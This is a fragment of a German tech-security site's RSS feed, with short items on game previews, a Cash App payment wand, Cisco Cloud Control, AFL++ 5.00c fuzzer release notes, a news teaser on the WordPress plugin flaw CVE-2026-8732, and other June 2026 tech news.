<guid isPermaLink="true">https://tsecurity.de/de/3575721/it-nachrichten/devolo-magic-2-wifi-6-next-im-test-starkes-wlan-aus-der-steckdose/</guid>
<pubDate>Fri, 05 Jun 2026 16:49:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WLAN durch dicke Wände? Der Devolo Magic 2 WiFi 6 Next bringt Internet per Steckdose. COMPUTER BILD testet Tempo, Reichweite und Praxis.]]></content:encoded>
</item>
<item>
<title><![CDATA[Fatekeeper Preview (PC)]]></title>
<description><![CDATA[Fatekeeper is the first game developed by Paraglacial, and it aims to step into the shoes of Dark Messiah of Might and Magic, one of the most popular first-person action RPGs from the past 20 years. Unfortunately, we never had a true successor to that game, but Fatekeeper aims to do that and a lo...]]></description>
<link>https://tsecurity.de/de/3574704/it-security-nachrichten/fatekeeper-preview-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574704/it-security-nachrichten/fatekeeper-preview-pc/</guid>
<pubDate>Fri, 05 Jun 2026 09:51:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fatekeeper is the first game developed by Paraglacial, and it aims to step into the shoes of Dark Messiah of Might and Magic, one of the most popular first-person action RPGs from the past 20 years. Unfortunately, we never had a true successor to that game, but Fatekeeper aims to do that and a lot more.

Right off the bat, we should note that the game is made only by 13 people, and it just entered early access. You have around 2 hours of playable content, and the game manages to provide a very intense, albeit short experience. You take the role of Kor Tenarim, a watcher who wants to complete his training. He also has a rodent partner called Kor Guran, and the two focus on braving enemies using magic and melee attacks.

The game’s scenery is stunning, and it feels made by a much larger theme. The attention to detail is also incredible, from the blood pouring from enemies, down to the very detailed leaves you can find within the game. It all looks amazing, and it makes...]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloudflare CEO is Lying to You About the Bot Traffic Jump]]></title>
<description><![CDATA[A magic trick is a trick. It misrepresents reality. What the Cloudflare CEO published as bot traffic increasing, is a trick. He misrepresents reality. The explanation is simple. The claim is false as stated: …bots passed human traffic online for the first time in the Internet’s history. The Cloud...]]></description>
<link>https://tsecurity.de/de/3573852/it-security-nachrichten/cloudflare-ceo-is-lying-to-you-about-the-bot-traffic-jump/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573852/it-security-nachrichten/cloudflare-ceo-is-lying-to-you-about-the-bot-traffic-jump/</guid>
<pubDate>Thu, 04 Jun 2026 22:38:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A magic trick is a trick. It misrepresents reality. What the Cloudflare CEO published as bot traffic increasing, is a trick. He misrepresents reality. The explanation is simple. The claim is false as stated: …bots passed human traffic online for the first time in the Internet’s history. The Cloudflare data shows online traffic is still … <a href="https://www.flyingpenguin.com/cloudflare-ceo-is-lying-to-you-about-the-bot-traffic-jump/" class="more-link">Continue reading <span class="screen-reader-text">Cloudflare CEO is Lying to You About the Bot Traffic Jump</span> <span class="meta-nav">→</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wave Cash App’s Magic Wand to Pay for Stuff]]></title>
<description><![CDATA[You can tap the star-shaped, NFC-enabled wand at terminals to make contactless payments. It's the first of several tap-to-pay hardware doodads coming from Cash App.]]></description>
<link>https://tsecurity.de/de/3573268/it-nachrichten/wave-cash-apps-magic-wand-to-pay-for-stuff/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573268/it-nachrichten/wave-cash-apps-magic-wand-to-pay-for-stuff/</guid>
<pubDate>Thu, 04 Jun 2026 18:17:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[You can tap the star-shaped, NFC-enabled wand at terminals to make contactless payments. It's the first of several tap-to-pay hardware doodads coming from Cash App.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cash App made a magic wand for contactless payments]]></title>
<description><![CDATA[The convenience of contactless payments can already feel magical, but Cash App is really leaning into that with its latest accessory. The mobile payment service is launching the Cash App Wand: an NFC-enabled, iridescent, star-topped wand that allows users to make on-the-go payments without pullin...]]></description>
<link>https://tsecurity.de/de/3573185/it-nachrichten/cash-app-made-a-magic-wand-for-contactless-payments/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573185/it-nachrichten/cash-app-made-a-magic-wand-for-contactless-payments/</guid>
<pubDate>Thu, 04 Jun 2026 18:02:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The convenience of contactless payments can already feel magical, but Cash App is really leaning into that with its latest accessory. The mobile payment service is launching the Cash App Wand: an NFC-enabled, iridescent, star-topped wand that allows users to make on-the-go payments without pulling out their phone or card. This plays on a popular […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Master the art of sword and sorcery in the Early Access release of Fatekeeper]]></title>
<description><![CDATA[THQ Nordic and developer Paraglacial released Fatekeeper into Early Access, a promising looking action RPG that mixes melee and magic in a handcrafted world.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3570371/linux-tipps/master-the-art-of-sword-and-sorcery-in-the-early-access-release-of-fatekeeper/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570371/linux-tipps/master-the-art-of-sword-and-sorcery-in-the-early-access-release-of-fatekeeper/</guid>
<pubDate>Wed, 03 Jun 2026 19:09:41 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[THQ Nordic and developer Paraglacial released Fatekeeper into Early Access, a promising looking action RPG that mixes melee and magic in a handcrafted world.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/741648798id29143gol.jpg" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/06/master-the-art-of-sword-and-sorcery-in-the-early-access-release-of-fatekeeper/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is Cisco Cloud Control and why should customers care?]]></title>
<description><![CDATA[As is typical of Cisco, the company made several product announcements at its flagship event, Cisco Live. The most significant product announcement is Cisco Cloud Control, which recognizes that customers do not run separate Cisco products; they run one sprawling, interconnected environment that m...]]></description>
<link>https://tsecurity.de/de/3570274/it-security-nachrichten/what-is-cisco-cloud-control-and-why-should-customers-care/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570274/it-security-nachrichten/what-is-cisco-cloud-control-and-why-should-customers-care/</guid>
<pubDate>Wed, 03 Jun 2026 18:23:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As is typical of <a href="https://www.cisco.com/">Cisco</a>, the company made several product announcements at its flagship event, <a href="https://www.ciscolive.com/">Cisco Live</a>. The most significant product announcement is Cisco Cloud Control, which recognizes that customers do not run separate Cisco products; they run one sprawling, interconnected environment that must be monitored, secured, and increasingly operated with AI at machine speed.</p>



<p>That is what Cisco Cloud Control is supposed to be: a single management plane with one login, one view, and one operational model spanning networking, security, compute, observability, and collaboration. Cisco is positioning it as the foundation for its broader AgenticOps vision, in which human operators and AI agents work from the same data and in the same workspace, with humans still in control. For Cisco customers, this matters because the company is finally trying to turn its massive product portfolio into an actual platform.</p>



<h2 class="wp-block-heading">More than another console</h2>



<p>On paper, Cloud Control sounds simple enough. It provides a unified environment, a shared data layer, and a common system of action, while also giving customers access to capabilities such as unified inventory, topology, policy, identity, and event correlation across the Cisco estate. During the keynote demos, Cisco showed single sign-on, all assets in one place, a single topology view, and direct access to products such as Meraki, Splunk, Security Cloud Control, Intersight, Control Hub, and Cisco IQ.</p>



<p>That alone would be useful. Cisco’s biggest enterprise customers have spent years dealing with product silos that made perfect sense inside the org chart but far less sense in an actual IT environment. Networking had its console, security had its console, observability had its tools, collaboration had its dashboard, and the poor operator in the middle had to stitch it all together manually. Cloud Control is Cisco’s admission that this model no longer scales.</p>



<h2 class="wp-block-heading">Why the single dashboard matters now</h2>



<p>The timing here is not accidental. In the AI era, operations are no longer just about watching dashboards and opening tickets. Infrastructure teams are being asked to diagnose and fix problems faster, while the threat landscape is compressing the time between vulnerability disclosure and exploitation from weeks to minutes. Cisco’s argument is that if customers are going to operate and defend infrastructure at machine speed, they cannot keep jumping from console to console and trying to correlate everything by hand.</p>



<p>That is why the single dashboard is more strategic than it sounds. Cisco is not just aggregating links to existing products. It is trying to create a common operational context so people and agents can work from the same inventory, topology, telemetry, and policies. If the old model was “visibility first, action later,” the new model is supposed to be visibility, reasoning, and action, all within the same environment.</p>



<h2 class="wp-block-heading">The break from Cisco’s past</h2>



<p>At Cisco Live 2024, Chief Product Officer Jeetu Patel declared that within two years, Cisco would be unrecognizable in a positive way. Cisco Live 2026 marks that two-year milestone, and Patel (pictured at top) has indeed made Cisco unrecognizable, with Cloud Control the most recent example. Historically, Cisco has rolled out one “single pane of glass” after another. In the past, I’ve said that if there were a Magic Quadrant for single panes of glass, Cisco would be the runaway leader because it had so many.</p>



<p>This is what makes Cloud Control so interesting. Cisco explicitly says this is not a “single pane of glass,” and the company is right to make that distinction. In its own words, glass is passive; Cloud Control is designed to enable active execution, with policy and identity built directly into the control path. That is a sharp departure from the old enterprise management philosophy, in which the dashboard’s job was mostly to display information and leave the operator to figure out the rest.</p>



<p>Cisco is also changing the abstraction layer.</p>



<p>For years, the company sold management in product-sized chunks. Now it is talking about a secure harness for agentic infrastructure, complete with trusted access, normalized APIs, Model Context Protocol connectivity, telemetry, enforcement points, and governance to ensure actions are bounded, auditable, and reversible. That is a much more ambitious framing, and frankly, it has to be. In a world of AI agents, the real value is not in prettier user interfaces. It is in creating a trusted operating environment where agents can do useful work without breaking things. At Cisco Live, all product demonstrations have been delivered from within Cisco Cloud Control, showcasing the product’s breadth and depth. </p>



<h2 class="wp-block-heading">AI Canvas is where the story gets real</h2>



<p>One of the strongest parts of the announcement is AI Canvas, which Cisco is moving into controlled availability as part of Cloud Control, rather than keeping it locked inside individual products. Cisco describes AI Canvas as a multiplayer workspace where human operators and AI agents investigate and resolve issues together, using the same live evidence, with context persisting across handoffs, shift changes, and escalations.</p>



<p>That is important because enterprise IT does not need more AI window dressing. It needs help with the messy middle of operations, where a single performance issue can become a network, policy, application, and security question all at once. Cisco says AI Canvas can take a natural-language prompt, build a multi-agent investigation plan, gather evidence across domains, and return a sourced answer, with the operator still approving the path forward. If that works as advertised, Cisco is not just simplifying operations. It’s changing how infrastructure work gets done.</p>



<h2 class="wp-block-heading">The marketplace makes this bigger than Cisco</h2>



<p>The other notable component of the announcement is the Marketplace, which is central to whether Cloud Control becomes a platform or just a better Cisco front end.</p>



<p>The Marketplace is a catalog of apps, agents, and integrations built by Cisco, customers, and partners, and it already includes integrations from more than 50 ecosystem partners. The partner list includes AWS, Google Cloud, Linear, Microsoft, Okta, PagerDuty, ServiceNow, Slack, Snowflake, Tenable, and Wiz, among others.</p>



<p>That matters because no enterprise is all-Cisco. The company acknowledges that customers operate multivendor environments and need to customize workflows beyond what Cisco ships out of the box. With Agent Builder, App Builder, and Marketplace, Cisco is also enabling customers to connect third-party tools, build their own agents, and create custom apps on top of Cisco’s control plane rather than waiting for a roadmap. That is a big deal because it moves Cisco from a product vendor to a platform operator.</p>



<p>After the keynote, I caught up with Evan Mintzer, director of production infrastructure at <a href="https://customersbank.com/">Customers Bank</a>. While he appreciates having a single dashboard for their Cisco products, it’s the ecosystem partnerships that truly caught his attention. “When Cisco displayed the slide of supported vendors, I recognized several we already use and a few others we’re considering,” Mintzer shared. “That ecosystem will make integrating them into our environment much easier.”</p>



<h2 class="wp-block-heading">Why every Cisco customer should care</h2>



<p>During his keynote, Patel made a comment that I think succinctly captures the value of Cisco Cloud Control: “Cloud Control is at its core simplicity without losing the sophistication of Cisco, and so what we’ve tried to do is say all the products that you know from Cisco and love will be managed from it.”</p>



<p>Historically, customers had to choose between the ease of use of a dashboard and the CLI for more complex tasks. Now they can do both through a natural language interface.</p>



<p>It’s also about capturing more value from the Cisco investment many companies have already made. The more Cisco infrastructure a customer runs, the more value the platform should deliver by connecting inventory, topology, policy, security, and AI-driven workflows in one place. Cisco has always had broad reach across the stack, but breadth alone is not enough. Without a unifying control layer, breadth becomes portfolio sprawl. Cloud Control is Cisco’s best attempt yet to turn that sprawl into an advantage.</p>



<p>There is also a defensive reason to care. Cisco is positioning Cloud Control as the command center for a post-Mythos world, tying it to Live Protect, unified security policy, asset visibility, vulnerability posture, and broader agentic security controls. In other words, this is not just an operations console. Cisco wants it to become the place where customers defend infrastructure in real time.</p>



<h2 class="wp-block-heading">My advice to Cisco customers</h2>



<p>Customers should approach Cloud Control with both enthusiasm and discipline. If you are a Cisco-heavy shop, this could become the operational layer that finally ties your environment together. But do not accept the vision based on branding alone.</p>



<p>First, test how Cloud Control reduces cross-domain complexity. A single pane of links is not the same as a single operating model.</p>



<p>Second, rigorously evaluate the AI governance model. Cisco wisely emphasizes human approval, auditability and bounded actions, but customers should validate this in real workflows before letting agents take any consequential actions.</p>



<p>Third, take the Marketplace seriously from day one. The ability to manage the Cisco domain from a single dashboard has obvious appeal, but extending it across a large percentage of the overall environment can significantly simplify operations and troubleshooting.</p>



<p>Cisco has had the pieces for years: leadership positions in networking, security, observability, collaboration, and infrastructure, plus one of the deepest installed bases in enterprise IT. What it has lacked is the control plane to bind them all together. Cloud Control shows that the company understands the future will not be won by having the most dashboards. It will be won by having the operating layer where humans and AI agents can work.</p>



<p>And that is why this launch matters. Cisco Cloud Control is not just another product announcement. It is Cisco’s effort to become the system through which its customers run the agentic enterprise. It’s positioned itself as “Mission Critical Infrastructure for the AI era” — but with Cloud Control, it’s that plus the operational environment.</p>



<h4 class="wp-block-heading">Read more stories from Cisco Live 2026</h4>



<ul class="wp-block-list">
<li><a href="https://www.networkworld.com/article/4179942/cisco-live-the-network-is-back-and-ai-rewrote-the-rules.html">Cisco Live: The network is back, and AI rewrote the rules</a></li>



<li><a href="https://www.networkworld.com/article/4179673/cisco-brings-agentic-ops-platform-and-security-overhaul-to-cisco-live.html">Cisco brings agentic ops platform and security overhaul to Cisco Live</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v5.00c]]></title>
<description><![CDATA[Version ++5.00c (release)
! AFL++ is now an AGPL 3.0 project !
! Files where the license could be switched were moved to AGPL 3.0+, files
that were under Apache 2.0 with contributations stay on that license.
! Commercial license (donate to a good cause - no money for AFL++) is available

Switched...]]></description>
<link>https://tsecurity.de/de/3570226/it-security-tools/v500c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570226/it-security-tools/v500c/</guid>
<pubDate>Wed, 03 Jun 2026 18:03:24 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Version ++5.00c (release)</h3>
<p>! AFL++ is now an AGPL 3.0 project !<br>
! Files where the license could be switched were moved to AGPL 3.0+, files<br>
that were under Apache 2.0 with contributations stay on that license.<br>
! Commercial license (donate to a good cause - no money for AFL++) is available</p>
<ul>
<li>Switched <a href="https://github.com/AFLplusplus/cov-analysis">https://github.com/AFLplusplus/cov-analysis</a> for outdated afl-cov</li>
<li>MacOS most current version support for afl-fuzz, afl-cc (incl. LTO) and<br>
frida mode!</li>
<li>Refreshed FreeBSD support by jsaunders-rr, thanks!</li>
<li>Linux persistent mode uses futex now which increases speed and reduces<br>
system call overhead (opt out with AFL_FAST_CHILD_SYNC), thanks to<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martinus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martinus">@martinus</a> for most of the implementation!</li>
<li>afl-fuzz:
<ul>
<li><code>-I tool</code> call now receives the new crash as a command line parameter</li>
<li>changed to a better map classifier</li>
<li>frameshift is disabled now if AFL_CUSTOM_MUTATOR_ONLY is set</li>
<li>python module fixes</li>
<li>minor speed, leak and zombie enhancements</li>
<li>stability info was lost on fast resume - fixed</li>
<li>somewhere we removed .state/variable/... now it is back :-)</li>
</ul>
</li>
<li>afl-cc:
<ul>
<li>Add LLVM 23 support</li>
<li>LTO and PCGUARD: new <code>AFL_LLVM_PATH</code> (also <code>AFL_LLVM_LTO_PATH</code> /<br>
<code>AFL_LLVM_PATH_MODE</code>) Ball-Larus per-function path coverage on top<br>
of edge coverage. Three levels: <code>=1</code> relaxed (collapse all<br>
guard-only BBs), <code>=2</code> restricted (collapse only 2-successor<br>
guard-only BBs), <code>=3</code> strict Ball-Larus. LTO additionally composes<br>
with <code>AFL_LLVM_LTO_CALLER</code>. See<br>
instrumentation/README.llvm.md and instrumentation/README.lto.md.</li>
<li>Fixes in the PCGUARD and LTO instrumentation that could lead to sanitizer<br>
triggers in target binaries</li>
<li>new instrumentation: <code>afl-llvm-bug-pass.so</code> provides five runtime<br>
oracles (SCALAR, BUDGET, SIZEFILL, ALLOCSIZE, SLACK) plus a slice-<br>
filter sub-mode for SCALAR, covering arithmetic-bound and logical-<br>
OOB bugs that ASan misses (<a title="CVE-2023-4863" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-j7hp-h8jx-5ppr/hovercard" href="https://github.com/advisories/GHSA-j7hp-h8jx-5ppr">CVE-2023-4863</a> / libwebp-Huffman class).<br>
Note: ALLOCSIZE/DERIVE are disabled automatically under<br>
AFL_USE_ASAN to avoid double-instrumentation; see<br>
docs/env_variables.md.
<ul>
<li><code>AFL_LLVM_BUG_SCALAR=1</code>   - max-value-per-arithmetic-site coverage,<br>
plus per-loop iteration count</li>
<li><code>AFL_LLVM_BUG_SCALAR_SLICE=1</code> - restrict SCALAR instrumentation to<br>
arithmetic that flows into a memory-<br>
size sink (allocator size, GEP index,<br>
memcpy/memset length). Implies SCALAR.</li>
<li><code>AFL_LLVM_BUG_BUDGET=1</code>   - check <code>ptr += func()</code> write-extent<br>
contract</li>
<li><code>AFL_LLVM_BUG_SIZEFILL=1</code>  - check NULL-means-size-only idioms</li>
<li><code>AFL_LLVM_BUG_ALLOCSIZE=1</code> - track every malloc/calloc/realloc and<br>
feed three signals (headroom IJON-min,<br>
proximity-bucket coverage edge, soft-OOB<br>
tripwire) per in-loop store</li>
<li><code>AFL_LLVM_BUG_SLACK=1</code>    - per-icmp |op0-op1| feedback, mapped<br>
MIN-style onto the bug map (inverse-<br>
bucket) for tight-comparison signal</li>
<li><code>AFL_LLVM_BUG_ALLOCSIZE_FUNCS=Name1,Name2,...</code> - extend tracking<br>
to user-listed custom allocators</li>
<li><code>AFL_LLVM_BUG_ALLOCSIZE_FREE_FUNCS=Name1,Name2,...</code> - matching<br>
custom-free functions for the above</li>
<li><code>AFL_LLVM_BUG_ALLOCSIZE_DERIVE=1</code> - log tracked allocation sizes<br>
into CmpLog RTN slots for <code>-l Z</code></li>
<li><code>AFL_LLVM_BUG=1</code>           - enable all bug-pass modes<br>
Per-site bug-map slots are kept in a private MAP_SIZE_BUG region and<br>
tracked max-rule (compatible with the IJON model)</li>
</ul>
</li>
<li>cmplog scheduling extensions (companion to bug-pass):
<ul>
<li><code>-l M</code> (afl-fuzz) - predicate-tightness scheduling. Treat any<br>
new per-site minimum slack on an inequality CmpLog cmp as a<br>
coverage event and mark the queue entry favoured. Catches the<br>
libwebp-1.3.1 / <a title="CVE-2023-4863" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-j7hp-h8jx-5ppr/hovercard" href="https://github.com/advisories/GHSA-j7hp-h8jx-5ppr">CVE-2023-4863</a> input pattern (validation<br>
predicates simultaneously at their tight edges).</li>
<li><code>AFL_LLVM_BUG_ALLOCSIZE_DERIVE=1</code> or <code>AFL_LLVM_BUG=1</code><br>
(compile-time) and<br>
<code>-l Z</code> (afl-fuzz) - size-derive logging. On every freed tracked<br>
allocation, write <code>(computed_size, max_observed_offset)</code> into a<br>
CmpLog RTN slot keyed by alloc-site. The existing CmpLog<br>
dictionary mining harvests <code>computed_size</code> as a magic constant<br>
and feeds the producing input bytes back into havoc.</li>
</ul>
</li>
</ul>
</li>
<li>afl-cmin*:
<ul>
<li>nyx_mode is now working for all minimizer variants</li>
</ul>
</li>
<li>afl-showmap:
<ul>
<li>no more .afl-showmap-temp-* files lying around</li>
</ul>
</li>
<li>IJON dist was changed to original IJON implementation: initial matching<br>
bytes, max length is 1024</li>
<li>lib* tools:
<ul>
<li>MacOS support is back, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jay-1409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jay-1409">@Jay-1409</a> !</li>
</ul>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mina the Hollower review – squeaky fresh fun full of vintage magic]]></title>
<description><![CDATA[PC, PlayStation 5, Nintendo Switch, Nintendo Switch 2, Xbox; Yacht Club GamesThis brilliant adventure creates a whole world from one character with a unique abilityYou could mistake Mina the Hollower for something found on the liquid-crystal display of a Game Boy Color around the turn of the mill...]]></description>
<link>https://tsecurity.de/de/3570171/it-nachrichten/mina-the-hollower-review-squeaky-fresh-fun-full-of-vintage-magic/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570171/it-nachrichten/mina-the-hollower-review-squeaky-fresh-fun-full-of-vintage-magic/</guid>
<pubDate>Wed, 03 Jun 2026 17:47:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><strong>PC, PlayStation 5, Nintendo Switch, Nintendo Switch 2, Xbox; Yacht Club Games<br></strong>This brilliant adventure creates a whole world from one character with a unique ability</p><p>You could mistake Mina the Hollower for something found on the liquid-crystal display of a Game Boy Color around the turn of the millennium. Like the pocketable Zelda and Pokémon games of the time, it presents a kind of snow-globe reality that you peer into from above, relying on imagination to decipher each two-colour clump of pixels into a tree, or a skeleton, or a cloaked mouse wielding a hammer twice her size.</p><p>This is Mina, our hero: she jumps, she moves at a clip, and she can delve downward into the soil or floorboards, tunnelling underfoot for a moment or two before popping back up, like an inflatable forcibly submerged in a swimming pool. This is her signature move, perfectly elastic in sensation – the way the released button springs back against your thumb! – and in application. The burrow-jump is an excavation tool, unearthing any treasure you happen to dig through, and a navigational one, used to hop over gaps, reach high-up spots and nose into tiny hidden spaces, where more treasure almost invariably awaits.</p> <a href="https://www.theguardian.com/games/2026/jun/03/mina-the-hollower-review">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Brings AirDrop-Like Sharing to More Android Phones]]></title>
<description><![CDATA[Google has expanded support for Quick Share, its file-sharing feature that now works with more Android devices and Apple's AirDrop system. The update makes it easier for Android and iPhone users to exchange photos, videos, documents, and other files without relying on messaging apps or cloud stor...]]></description>
<link>https://tsecurity.de/de/3569836/ios-mac-os/google-brings-airdrop-like-sharing-to-more-android-phones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569836/ios-mac-os/google-brings-airdrop-like-sharing-to-more-android-phones/</guid>
<pubDate>Wed, 03 Jun 2026 15:51:34 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google has expanded support for Quick Share, its file-sharing feature that now works with more Android devices and Apple's AirDrop system. The update makes it easier for Android and iPhone users to exchange photos, videos, documents, and other files without relying on messaging apps or cloud storage services.



Quick Share serves as Android's answer to AirDrop, and since late 2025, it has supported direct file transfers between Android devices and Apple products. With this latest expansion, the feature is now available on a wider range of smartphones from Samsung, Google, OnePlus, HONOR, OPPO, Vivo, and Xiaomi.



More Android Phones Now Support Quick Share



Google has added support for several new devices, including:



Samsung




Galaxy S26, S26+, S26 Ultra



Galaxy S25, S25+, S25 Ultra, S25 Edge



Galaxy S24, S24+, S24 Ultra



Galaxy Z Flip7



Galaxy Z Fold7



Galaxy Z Flip6



Galaxy Z Fold6



Galaxy Z TriFold




Google Pixel




Pixel 10 series



Pixel 9 series



Pixel 8a




Other Android Brands




HONOR Magic V6



OnePlus 15



Xiaomi 17T Pro



OPPO Find X9 series



OPPO Find N6



Vivo X300 series




Android users who want to send files to an iPhone need to enable the "Share with Apple devices" option in Quick Share. On the iPhone side, AirDrop visibility must be set to "Everyone for 10 minutes" from Control Center.



Once both settings are enabled, the transfer process works much like a regular AirDrop session. The Android device appears as a sharing target, allowing files and photos to move directly between the two devices.



Similarly, iPhone users can use the standard AirDrop interface to send files to compatible Android smartphones. Android users only need to make sure that Quick Share Receive mode is turned on before accepting incoming files.



Google says the feature is not limited to iPhones. Android users can also share files with iPads and Mac computers through the same integration, making cross-platform file transfers much more convenient for people who use devices from both ecosystems.



For Android devices that do not support Quick Share, users can generate a QR code and share content through a cloud-based transfer method.



More Devices Coming Soon



Google also confirmed that Quick Share support will expand further in the coming months. Upcoming devices include the Motorola Razr Fold 2026, the OPPO Find X8 series, and the HONOR Magic8 Pro.



As Google continues to expand compatibility, Quick Share is becoming one of the easiest ways for Android and Apple users to exchange files without extra apps or complicated setup steps.]]></content:encoded>
</item>
<item>
<title><![CDATA[WP Maps Pro: CVE-2026-8732 ermöglicht Admin-Übernahme per Magic Login]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Angreifer versuchen derzeit, über eine aktiv ausgenutzte Schwachstelle in WP Maps Pro Administrator-Konten auf betroffenen WordPress-Seiten anzulegen. Die Lücke (CVE-2026-8732, CVSS 9,8) erlaubt Authentifizierungsumgehung über einen missbrauchten „Temporary Access“-Mechanis...]]></description>
<link>https://tsecurity.de/de/3569499/it-security-nachrichten/wp-maps-pro-cve-2026-8732-ermoeglicht-admin-uebernahme-per-magic-login/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569499/it-security-nachrichten/wp-maps-pro-cve-2026-8732-ermoeglicht-admin-uebernahme-per-magic-login/</guid>
<pubDate>Wed, 03 Jun 2026 14:23:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/wp-maps-pro-cve-2026-8732-magic-login.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/wp-maps-pro-cve-2026-8732-magic-login.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/wp-maps-pro-cve-2026-8732-magic-login-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/wp-maps-pro-cve-2026-8732-magic-login-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/wp-maps-pro-cve-2026-8732-magic-login-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/wp-maps-pro-cve-2026-8732-magic-login-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/wp-maps-pro-cve-2026-8732-magic-login-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Angreifer versuchen derzeit, über eine aktiv ausgenutzte Schwachstelle in WP Maps Pro Administrator-Konten auf betroffenen WordPress-Seiten anzulegen. Die Lücke (CVE-2026-8732, CVSS 9,8) erlaubt Authentifizierungsumgehung über einen missbrauchten „Temporary Access“-Mechanismus und endet in einer vollständigen Site-Übernahme. Betroffene sollten das Plugin umgehend auf Version 6.1.1 aktualisieren, nachdem der Patch am 20. Mai 2026 […]</p>
<div><a href="https://www.it-boltwise.de/wp-maps-pro-cve-2026-8732-ermoeglicht-admin-uebernahme-per-magic-login.html">... den vollständigen Artikel <strong>»WP Maps Pro: CVE-2026-8732 ermöglicht Admin-Übernahme per Magic Login«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/wp-maps-pro-cve-2026-8732-ermoeglicht-admin-uebernahme-per-magic-login.html">WP Maps Pro: CVE-2026-8732 ermöglicht Admin-Übernahme per Magic Login</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta Officially Ends ‘Metaverse’ Experiment]]></title>
<description><![CDATA[Facebook parent largely ends support for flagship social VR app, Horizon Worlds, this month after investing tens of billions This article has been indexed from Silicon UK Read the original article: Meta Officially Ends ‘Metaverse’ Experiment
Read more →
The post Meta Officially Ends ‘Metaverse’ E...]]></description>
<link>https://tsecurity.de/de/3569005/it-security-nachrichten/meta-officially-ends-metaverse-experiment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569005/it-security-nachrichten/meta-officially-ends-metaverse-experiment/</guid>
<pubDate>Wed, 03 Jun 2026 11:37:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Facebook parent largely ends support for flagship social VR app, Horizon Worlds, this month after investing tens of billions This article has been indexed from Silicon UK Read the original article: Meta Officially Ends ‘Metaverse’ Experiment</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/meta-officially-ends-metaverse-experiment/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/meta-officially-ends-metaverse-experiment/">Meta Officially Ends ‘Metaverse’ Experiment</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
